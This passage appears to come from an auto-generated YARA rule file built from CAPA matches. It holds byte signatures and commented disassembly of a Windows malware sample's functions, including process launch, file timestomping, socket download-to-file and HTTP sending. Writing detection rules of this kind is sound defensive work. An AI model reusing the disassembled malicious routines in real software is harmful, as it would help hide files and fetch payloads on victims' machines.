.text:0x00403737 898de8f7ffff mov dword [ebp - 2072],ecx + .text:0x0040373d 8b550c mov edx,dword [ebp + 12] + .text:0x00403740 8b420c mov eax,dword [edx + 12] + .text:0x00403743 8985ecf7ffff mov dword [ebp - 2068],eax + .text:0x00403749 8b4d0c mov ecx,dword [ebp + 12] + .text:0x0040374c 8b5110 mov edx,dword [ecx + 16] + .text:0x0040374f 8995e4f7ffff mov dword [ebp - 2076],edx + .text:0x00403755 8b450c mov eax,dword [ebp + 12] + .text:0x00403758 8b4814 mov ecx,dword [eax + 20] + .text:0x0040375b 898df0f7ffff mov dword [ebp - 2064],ecx + .text:0x00403761 8b95f0f7ffff mov edx,dword [ebp - 2064] + .text:0x00403767 52 push edx + .text:0x00403768 8b85e4f7ffff mov eax,dword [ebp - 2076] + .text:0x0040376e 50 push eax + .text:0x0040376f 8b8decf7ffff mov ecx,dword [ebp - 2068] + .text:0x00403775 51 push ecx + .text:0x00403776 8b95e8f7ffff mov edx,dword [ebp - 2072] + .text:0x0040377c 52 push edx + .text:0x0040377d e84edaffff call 0x004011d0 ;sub_004011d0(0x61616161,0x61616161,0x61616161,0x61616161) + .text:0x00403782 83c410 add esp,16 + .text:0x00403785 eb05 jmp 0x0040378c + .text:0x00403787 loc_00403787: [1 XREFS] + .text:0x00403787 e874d8ffff call 0x00401000 ;sub_00401000() + .text:0x0040378c loc_0040378c: [1 XREFS] + .text:0x0040378c e99d000000 jmp 0x0040382e + .text:0x00403791 loc_00403791: [1 XREFS] + .text:0x00403791 8b450c mov eax,dword [ebp + 12] + .text:0x00403794 8b4804 mov ecx,dword [eax + 4] + .text:0x00403797 898dc8e7ffff mov dword [ebp - 6200],ecx + .text:0x0040379d 6864c14000 push 0x0040c164 + .text:0x004037a2 8b95c8e7ffff mov edx,dword [ebp - 6200] + .text:0x004037a8 52 push edx + .text:0x004037a9 e8210b0000 call 0x004042cf ;__mbscmp(arg1,0x61616161,0x61616161) + .text:0x004037ae 83c408 add esp,8 + .text:0x004037b1 85c0 test eax,eax + .text:0x004037b3 7574 jnz 0x00403829 + .text:0x004037b5 837d0803 cmp dword [ebp + 8],3 + .text:0x004037b9 7567 jnz 0x00403822 + .text:0x004037bb 6800040000 push 1024 + .text:0x004037c0 8d85e4f3ffff lea eax,dword [ebp - 3100] + .text:0x004037c6 50 push eax + .text:0x004037c7 6800040000 push 1024 + .text:0x004037cc 8d8de4e7ffff lea ecx,dword [ebp - 6172] + .text:0x004037d2 51 push ecx + .text:0x004037d3 6800040000 push 1024 + .text:0x004037d8 8d95e4efffff lea edx,dword [ebp - 4124] + .text:0x004037de 52 push edx + .text:0x004037df 6800040000 push 1024 + .text:0x004037e4 8d85e4ebffff lea eax,dword [ebp - 5148] + .text:0x004037ea 50 push eax + .text:0x004037eb e8c0dcffff call 0x004014b0 ;sub_004014b0(local5152,1024,local4128,1024,local6176,1024,local3104) + .text:0x004037f0 83c420 add esp,32 + .text:0x004037f3 85c0 test eax,eax + .text:0x004037f5 7529 jnz 0x00403820 + .text:0x004037f7 8d8de4f3ffff lea ecx,dword [ebp - 3100] + .text:0x004037fd 51 push ecx + .text:0x004037fe 8d95e4e7ffff lea edx,dword [ebp - 6172] + .text:0x00403804 52 push edx + .text:0x00403805 8d85e4efffff lea eax,dword [ebp - 4124] + .text:0x0040380b 50 push eax + .text:0x0040380c 8d8de4ebffff lea ecx,dword [ebp - 5148] + .text:0x00403812 51 push ecx + .text:0x00403813 684cc14000 push 0x0040c14c + .text:0x00403818 e81c010000 call 0x00403939 ;sub_00403939(0x0040c14c,local5152) + .text:0x0040381d 83c414 add esp,20 + .text:0x00403820 loc_00403820: [1 XREFS] + .text:0x00403820 eb05 jmp 0x00403827 + .text:0x00403822 loc_00403822: [1 XREFS] + .text:0x00403822 e8d9d7ffff call 0x00401000 ;sub_00401000() + .text:0x00403827 loc_00403827: [1 XREFS] + .text:0x00403827 eb05 jmp 0x0040382e + .text:0x00403829 loc_00403829: [1 XREFS] + .text:0x00403829 e8d2d7ffff call 0x00401000 ;sub_00401000() + .text:0x0040382e loc_0040382e: [5 XREFS] + .text:0x0040382e 33c0 xor eax,eax + .text:0x00403830 loc_00403830: [2 XREFS] + .text:0x00403830 5f pop edi + .text:0x00403831 5e pop esi + .text:0x00403832 5b pop ebx + .text:0x00403833 8be5 mov esp,ebp + .text:0x00403835 5d pop ebp + .text:0x00403836 c3 ret + */ + $c45 = { 55 8B EC B8 38 18 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 83 7D ?? 01 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 44 8A ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 42 ?? 89 85 ?? ?? ?? ?? 68 70 C1 40 00 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 83 C8 FF E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 EB ?? 83 7D ?? 04 75 ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 68 6C C1 40 00 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 83 C8 FF E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? 83 7D ?? 04 75 ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 68 68 C1 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 07 75 ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 8B 42 ?? 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 10 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 68 64 C1 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 20 85 C0 75 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 4C C1 40 00 E8 ?? ?? ?? ?? 83 C4 14 EB ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00402410@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - create process on Windows + .text:0x00402410 + .text:0x00402410 FUNC: int cdecl sub_00402410( ) [14 XREFS] + .text:0x00402410 + .text:0x00402410 Stack Variables: (offset from initial top of stack) + .text:0x00402410 -264: int local264 + .text:0x00402410 -524: int local524 + .text:0x00402410 + .text:0x00402410 55 push ebp + .text:0x00402411 8bec mov ebp,esp + .text:0x00402413 81ec08020000 sub esp,520 + .text:0x00402419 53 push ebx + .text:0x0040241a 56 push esi + .text:0x0040241b 57 push edi + .text:0x0040241c 6804010000 push 260 + .text:0x00402421 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402427 50 push eax + .text:0x00402428 6a00 push 0 + .text:0x0040242a ff1538b04000 call dword [0x0040b038] ;kernel32.GetModuleFileNameA(0,local524,260) + .text:0x00402430 6804010000 push 260 + .text:0x00402435 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x0040243b 51 push ecx + .text:0x0040243c 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00402442 52 push edx + .text:0x00402443 ff153cb04000 call dword [0x0040b03c] ;kernel32.GetShortPathNameA(local524,local524,260) + .text:0x00402449 bfdcc04000 mov edi,0x0040c0dc + .text:0x0040244e 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x00402454 83c9ff or ecx,0xffffffff + .text:0x00402457 33c0 xor eax,eax + .text:0x00402459 f2ae repnz: scasb + .text:0x0040245b f7d1 not ecx + .text:0x0040245d 2bf9 sub edi,ecx + .text:0x0040245f 8bf7 mov esi,edi + .text:0x00402461 8bc1 mov eax,ecx + .text:0x00402463 8bfa mov edi,edx + .text:0x00402465 c1e902 shr ecx,2 + .text:0x00402468 f3a5 rep: movsd + .text:0x0040246a 8bc8 mov ecx,eax + .text:0x0040246c 83e103 and ecx,3 + .text:0x0040246f f3a4 rep: movsb + .text:0x00402471 8dbdf8fdffff lea edi,dword [ebp - 520] + .text:0x00402477 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x0040247d 83c9ff or ecx,0xffffffff + .text:0x00402480 33c0 xor eax,eax + .text:0x00402482 f2ae repnz: scasb + .text:0x00402484 f7d1 not ecx + .text:0x00402486 2bf9 sub edi,ecx + .text:0x00402488 8bf7 mov esi,edi + .text:0x0040248a 8bd9 mov ebx,ecx + .text:0x0040248c 8bfa mov edi,edx + .text:0x0040248e 83c9ff or ecx,0xffffffff + .text:0x00402491 33c0 xor eax,eax + .text:0x00402493 f2ae repnz: scasb + .text:0x00402495 83c7ff add edi,0xffffffff + .text:0x00402498 8bcb mov ecx,ebx + .text:0x0040249a c1e902 shr ecx,2 + .text:0x0040249d f3a5 rep: movsd + .text:0x0040249f 8bcb mov ecx,ebx + .text:0x004024a1 83e103 and ecx,3 + .text:0x004024a4 f3a4 rep: movsb + .text:0x004024a6 bfd4c04000 mov edi,0x0040c0d4 + .text:0x004024ab 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x004024b1 83c9ff or ecx,0xffffffff + .text:0x004024b4 33c0 xor eax,eax + .text:0x004024b6 f2ae repnz: scasb + .text:0x004024b8 f7d1 not ecx + .text:0x004024ba 2bf9 sub edi,ecx + .text:0x004024bc 8bf7 mov esi,edi + .text:0x004024be 8bd9 mov ebx,ecx + .text:0x004024c0 8bfa mov edi,edx + .text:0x004024c2 83c9ff or ecx,0xffffffff + .text:0x004024c5 33c0 xor eax,eax + .text:0x004024c7 f2ae repnz: scasb + .text:0x004024c9 83c7ff add edi,0xffffffff + .text:0x004024cc 8bcb mov ecx,ebx + .text:0x004024ce c1e902 shr ecx,2 + .text:0x004024d1 f3a5 rep: movsd + .text:0x004024d3 8bcb mov ecx,ebx + .text:0x004024d5 83e103 and ecx,3 + .text:0x004024d8 f3a4 rep: movsb + .text:0x004024da 6a00 push 0 + .text:0x004024dc 6a00 push 0 + .text:0x004024de 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004024e4 50 push eax + .text:0x004024e5 68ccc04000 push 0x0040c0cc + .text:0x004024ea 6a00 push 0 + .text:0x004024ec 6a00 push 0 + .text:0x004024ee ff1538b14000 call dword [0x0040b138] ;shell32.ShellExecuteA(0,0,0x0040c0cc,local264,0,0) + .text:0x004024f4 6a00 push 0 + .text:0x004024f6 e8ae080000 call 0x00402da9 ;_exit(0) + .text:0x004024fb 5f pop edi + .text:0x004024fc 5e pop esi + .text:0x004024fd 5b pop ebx + .text:0x004024fe 8be5 mov esp,ebp + .text:0x00402500 5d pop ebp + .text:0x00402501 c3 ret + */ + $c46 = { 55 8B EC 81 EC 08 02 00 00 53 56 57 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 68 04 01 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? BF DC C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF D4 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 68 CC C0 40 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004014e0@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - timestomp file + .text:0x004014e0 + .text:0x004014e0 FUNC: int cdecl sub_004014e0( int arg0, int arg1, ) [2 XREFS] + .text:0x004014e0 + .text:0x004014e0 Stack Variables: (offset from initial top of stack) + .text:0x004014e0 8: int arg1 + .text:0x004014e0 4: int arg0 + .text:0x004014e0 -12: int local12 + .text:0x004014e0 -20: int local20 + .text:0x004014e0 -28: int local28 + .text:0x004014e0 -32: int local32 + .text:0x004014e0 + .text:0x004014e0 55 push ebp + .text:0x004014e1 8bec mov ebp,esp + .text:0x004014e3 83ec1c sub esp,28 + .text:0x004014e6 6a00 push 0 + .text:0x004014e8 6880000000 push 128 + .text:0x004014ed 6a03 push 3 + .text:0x004014ef 6a00 push 0 + .text:0x004014f1 6a01 push 1 + .text:0x004014f3 6800000080 push 0x80000000 + .text:0x004014f8 8b450c mov eax,dword [ebp + 12] + .text:0x004014fb 50 push eax + .text:0x004014fc ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0) + .text:0x00401502 8945e4 mov dword [ebp - 28],eax + .text:0x00401505 837de400 cmp dword [ebp - 28],0 + .text:0x00401509 750a jnz 0x00401515 + .text:0x0040150b b801000000 mov eax,1 + .text:0x00401510 e98b000000 jmp 0x004015a0 + .text:0x00401515 loc_00401515: [1 XREFS] + .text:0x00401515 8d4df0 lea ecx,dword [ebp - 16] + .text:0x00401518 51 push ecx + .text:0x00401519 8d55e8 lea edx,dword [ebp - 24] + .text:0x0040151c 52 push edx + .text:0x0040151d 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401520 50 push eax + .text:0x00401521 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401524 51 push ecx + .text:0x00401525 ff1558b04000 call dword [0x0040b058] ;kernel32.GetFileTime(kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0),local12,local28,local20) + .text:0x0040152b 85c0 test eax,eax + .text:0x0040152d 7511 jnz 0x00401540 + .text:0x0040152f 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401532 52 push edx + .text:0x00401533 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004014fc>) + .text:0x00401539 b801000000 mov eax,1 + .text:0x0040153e eb60 jmp 0x004015a0 + .text:0x00401540 loc_00401540: [1 XREFS] + .text:0x00401540 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401543 50 push eax + .text:0x00401544 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004014fc>) + .text:0x0040154a 6a00 push 0 + .text:0x0040154c 6880000000 push 128 + .text:0x00401551 6a03 push 3 + .text:0x00401553 6a00 push 0 + .text:0x00401555 6a02 push 2 + .text:0x00401557 6800000040 push 0x40000000 + .text:0x0040155c 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040155f 51 push ecx + .text:0x00401560 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0) + .text:0x00401566 8945e4 mov dword [ebp - 28],eax + .text:0x00401569 8d55f0 lea edx,dword [ebp - 16] + .text:0x0040156c 52 push edx + .text:0x0040156d 8d45e8 lea eax,dword [ebp - 24] + .text:0x00401570 50 push eax + .text:0x00401571 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401574 51 push ecx + .text:0x00401575 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401578 52 push edx + .text:0x00401579 ff155cb04000 call dword [0x0040b05c] ;kernel32.SetFileTime(kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0),local12,local28,local20) + .text:0x0040157f 85c0 test eax,eax + .text:0x00401581 7511 jnz 0x00401594 + .text:0x00401583 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401586 50 push eax + .text:0x00401587 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401560>) + .text:0x0040158d b801000000 mov eax,1 + .text:0x00401592 eb0c jmp 0x004015a0 + .text:0x00401594 loc_00401594: [1 XREFS] + .text:0x00401594 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401597 51 push ecx + .text:0x00401598 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401560>) + .text:0x0040159e 33c0 xor eax,eax + .text:0x004015a0 loc_004015a0: [3 XREFS] + .text:0x004015a0 8be5 mov esp,ebp + .text:0x004015a2 5d pop ebp + .text:0x004015a3 c3 ret + */ + $c47 = { 55 8B EC 83 EC 1C 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 03 6A 00 6A 02 68 00 00 00 40 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C3 } + /* +function at 0x004019e0@b94af4a4d4af6eac81fc135abda1c40c with 4 features: + - receive and write data from server to client + - receive data + - receive data on socket + - write file on Windows + .text:0x004019e0 + .text:0x004019e0 FUNC: int cdecl sub_004019e0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004019e0 + .text:0x004019e0 Stack Variables: (offset from initial top of stack) + .text:0x004019e0 12: int arg2 + .text:0x004019e0 8: int arg1 + .text:0x004019e0 4: int arg0 + .text:0x004019e0 -8: int local8 + .text:0x004019e0 -12: int local12 + .text:0x004019e0 -524: int local524 + .text:0x004019e0 -528: int local528 + .text:0x004019e0 + .text:0x004019e0 55 push ebp + .text:0x004019e1 8bec mov ebp,esp + .text:0x004019e3 81ec0c020000 sub esp,524 + .text:0x004019e9 c745f800000000 mov dword [ebp - 8],0 + .text:0x004019f0 8b450c mov eax,dword [ebp + 12] + .text:0x004019f3 50 push eax + .text:0x004019f4 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004019f7 51 push ecx + .text:0x004019f8 8d55f8 lea edx,dword [ebp - 8] + .text:0x004019fb 52 push edx + .text:0x004019fc e83ffcffff call 0x00401640 ;sub_00401640(local12,arg0,arg1) + .text:0x00401a01 83c40c add esp,12 + .text:0x00401a04 85c0 test eax,eax + .text:0x00401a06 740a jz 0x00401a12 + .text:0x00401a08 b801000000 mov eax,1 + .text:0x00401a0d e9d4000000 jmp 0x00401ae6 + .text:0x00401a12 loc_00401a12: [1 XREFS] + .text:0x00401a12 6a00 push 0 + .text:0x00401a14 6880000000 push 128 + .text:0x00401a19 6a02 push 2 + .text:0x00401a1b 6a00 push 0 + .text:0x00401a1d 6a02 push 2 + .text:0x00401a1f 6800000040 push 0x40000000 + .text:0x00401a24 8b4510 mov eax,dword [ebp + 16] + .text:0x00401a27 50 push eax + .text:0x00401a28 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0) + .text:0x00401a2e 8985f4fdffff mov dword [ebp - 524],eax + .text:0x00401a34 83bdf4fdffffff cmp dword [ebp - 524],0xffffffff + .text:0x00401a3b 7516 jnz 0x00401a53 + .text:0x00401a3d 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401a40 51 push ecx + .text:0x00401a41 e8fafcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401a46 83c404 add esp,4 + .text:0x00401a49 b801000000 mov eax,1 + .text:0x00401a4e e993000000 jmp 0x00401ae6 + .text:0x00401a53 loc_00401a53: [2 XREFS] + .text:0x00401a53 6a00 push 0 + .text:0x00401a55 6800020000 push 512 + .text:0x00401a5a 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401a60 52 push edx + .text:0x00401a61 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401a64 50 push eax + .text:0x00401a65 ff1560b14000 call dword [0x0040b160] ;ws2_32.recv(0,local524,512) + .text:0x00401a6b 8945fc mov dword [ebp - 4],eax + .text:0x00401a6e 6a00 push 0 + .text:0x00401a70 6a00 push 0 + .text:0x00401a72 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401a75 51 push ecx + .text:0x00401a76 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401a7c 52 push edx + .text:0x00401a7d 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401a83 50 push eax + .text:0x00401a84 ff1544b04000 call dword [0x0040b044] ;kernel32.WriteFile(kernel32.CreateFileA(arg2,0x40000000,2,0,2,128,0),local524,ws2_32.recv(0,local524,512),0,0) + .text:0x00401a8a 85c0 test eax,eax + .text:0x00401a8c 7520 jnz 0x00401aae + .text:0x00401a8e 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401a91 51 push ecx + .text:0x00401a92 e8a9fcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401a97 83c404 add esp,4 + .text:0x00401a9a 8b95f4fdffff mov edx,dword [ebp - 524] + .text:0x00401aa0 52 push edx + .text:0x00401aa1 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401a28>) + .text:0x00401aa7 b801000000 mov eax,1 + .text:0x00401aac eb38 jmp 0x00401ae6 + .text:0x00401aae loc_00401aae: [1 XREFS] + .text:0x00401aae 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401ab2 7f9f jg 0x00401a53 + .text:0x00401ab4 8b85f4fdffff mov eax,dword [ebp - 524] + .text:0x00401aba 50 push eax + .text:0x00401abb ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401a28>) + .text:0x00401ac1 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401ac4 51 push ecx + .text:0x00401ac5 e876fcffff call 0x00401740 ;sub_00401740(local12) + .text:0x00401aca 83c404 add esp,4 + .text:0x00401acd 85c0 test eax,eax + .text:0x00401acf 7407 jz 0x00401ad8 + .text:0x00401ad1 b801000000 mov eax,1 + .text:0x00401ad6 eb0e jmp 0x00401ae6 + .text:0x00401ad8 loc_00401ad8: [1 XREFS] + .text:0x00401ad8 8b5510 mov edx,dword [ebp + 16] + .text:0x00401adb 52 push edx + .text:0x00401adc e8cffaffff call 0x004015b0 ;sub_004015b0(local12,arg2) + .text:0x00401ae1 83c404 add esp,4 + .text:0x00401ae4 33c0 xor eax,eax + .text:0x00401ae6 loc_00401ae6: [4 XREFS] + .text:0x00401ae6 8be5 mov esp,ebp + .text:0x00401ae8 5d pop ebp + .text:0x00401ae9 c3 ret + */ + $c48 = { 55 8B EC 81 EC 0C 02 00 00 C7 45 ?? 00 00 00 00 8B 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 0C 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 02 6A 00 6A 02 68 00 00 00 40 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 B8 01 00 00 00 E9 ?? ?? ?? ?? 6A 00 68 00 02 00 00 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 6A 00 6A 00 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 83 7D ?? 00 7F ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 04 33 C0 8B E5 5D C3 } + /* +function at 0x00401af0@b94af4a4d4af6eac81fc135abda1c40c with 5 features: + - receive data + - receive data on socket + - send HTTP request + - send data + - send data on socket + .text:0x00401af0 + .text:0x00401af0 FUNC: int cdecl sub_00401af0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x00401af0 + .text:0x00401af0 Stack Variables: (offset from initial top of stack) + .text:0x00401af0 20: int arg4 + .text:0x00401af0 16: int arg3 + .text:0x00401af0 12: int arg2 + .text:0x00401af0 8: int arg1 + .text:0x00401af0 4: int arg0 + .text:0x00401af0 -8: int local8 + .text:0x00401af0 -1032: int local1032 + .text:0x00401af0 -1036: int local1036 + .text:0x00401af0 -1040: int local1040 + .text:0x00401af0 -1552: int local1552 + .text:0x00401af0 -1556: int local1556 + .text:0x00401af0 + .text:0x00401af0 55 push ebp + .text:0x00401af1 8bec mov ebp,esp + .text:0x00401af3 81ec10060000 sub esp,1552 + .text:0x00401af9 53 push ebx + .text:0x00401afa 56 push esi + .text:0x00401afb 57 push edi + .text:0x00401afc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x00401b06 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x00401b10 8b450c mov eax,dword [ebp + 12] + .text:0x00401b13 50 push eax + .text:0x00401b14 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b17 51 push ecx + .text:0x00401b18 8d95f4fbffff lea edx,dword [ebp - 1036] + .text:0x00401b1e 52 push edx + .text:0x00401b1f e81cfbffff call 0x00401640 ;sub_00401640(local1040,arg0,arg1) + .text:0x00401b24 83c40c add esp,12 + .text:0x00401b27 85c0 test eax,eax + .text:0x00401b29 740a jz 0x00401b35 + .text:0x00401b2b b801000000 mov eax,1 + .text:0x00401b30 e9c7010000 jmp 0x00401cfc + .text:0x00401b35 loc_00401b35: [1 XREFS] + .text:0x00401b35 bf80c04000 mov edi,0x0040c080 + .text:0x00401b3a 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x00401b40 83c9ff or ecx,0xffffffff + .text:0x00401b43 33c0 xor eax,eax + .text:0x00401b45 f2ae repnz: scasb + .text:0x00401b47 f7d1 not ecx + .text:0x00401b49 2bf9 sub edi,ecx + .text:0x00401b4b 8bf7 mov esi,edi + .text:0x00401b4d 8bc1 mov eax,ecx + .text:0x00401b4f 8bfa mov edi,edx + .text:0x00401b51 c1e902 shr ecx,2 + .text:0x00401b54 f3a5 rep: movsd + .text:0x00401b56 8bc8 mov ecx,eax + .text:0x00401b58 83e103 and 